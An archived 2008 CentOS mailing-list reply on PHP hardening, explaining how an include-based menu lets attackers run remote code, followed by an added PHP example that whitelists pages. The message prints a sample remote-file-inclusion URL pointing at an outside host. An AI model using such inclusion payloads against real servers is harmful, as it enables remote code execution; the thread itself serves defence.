[CentOS] mystery process "unit"
Rainer Duffner
rainer at ultra-secure.de
Tue Aug 12 16:18:45 UTC 2008
sbeam wrote:
> On Tuesday 12 August 2008 10:16, Rainer Duffner wrote:
>
>> Anything in /tmp ?
>>
>> Disable register_globals and allow_url_fopen.
>> Set open_basedir for any virtual hosts to the absolute minimum.
>>
>
> I have mod_security installed now, but I tested a similar attack, and sadly,
> it still succeeds as long as allow_url_fopen is on. But this is not CentOS
> related.
>
Yeah, because allow_url_fopen basically means "I want to run code from
some random site", in most cases.
E.g., when they have implemented a crappy starting-page "index.php"
where there is a menu that calls index.php?link=file1.html
if item one was clicked.
Too bad people can use that to get
index.php?link=http://some.geocities.page/foo.gif executed as PHP on
your server!
(I think it requires both register_globals and allow_url_fopen to be on,
but I'm not sure if you can't get it to work with only allow_url_fopen....)
cheers,
Rainer
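
The menu pattern described in the message, with the `link` value restricted to selecting from a fixed list so it never reaches `include` (added example, not part of the original post; the page names, the `pages/` directory and the `resolve_page` helper are assumptions):

```php
<?php
// Added example, not code from the thread. PAGE_DIR, PAGES and resolve_page()
// are hypothetical names chosen for illustration.

// Pattern the message describes: the request parameter goes straight into
// include. With register_globals on, $link is filled from ?link=... by PHP.
//   include($link);            // or: include($_GET['link']);

// Hardened form: the request value only selects a key in a fixed map.
const PAGE_DIR = __DIR__ . '/pages';   // assumed location of the menu pages
const PAGES = [
    'file1.html' => 'file1.html',
    'file2.html' => 'file2.html',
];

function resolve_page($requested)
{
    // Arrays (?link[]=x) and any value not in the map are rejected outright,
    // so URLs and ../ sequences never reach the filesystem layer.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must sit inside PAGE_DIR
    // (this also catches a symlink planted in the pages directory).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page(isset($_GET['link']) ? $_GET['link'] : null);
if ($page === null) {
    http_response_code(404);
    exit('Not found');
}
// The menu pages are static HTML, so they are sent as data with readfile()
// and are never parsed as PHP.
readfile($page);
```

Because the pages are emitted with `readfile()` instead of `include`, the outcome no longer depends on how `allow_url_fopen` or `register_globals` happen to be set on the host.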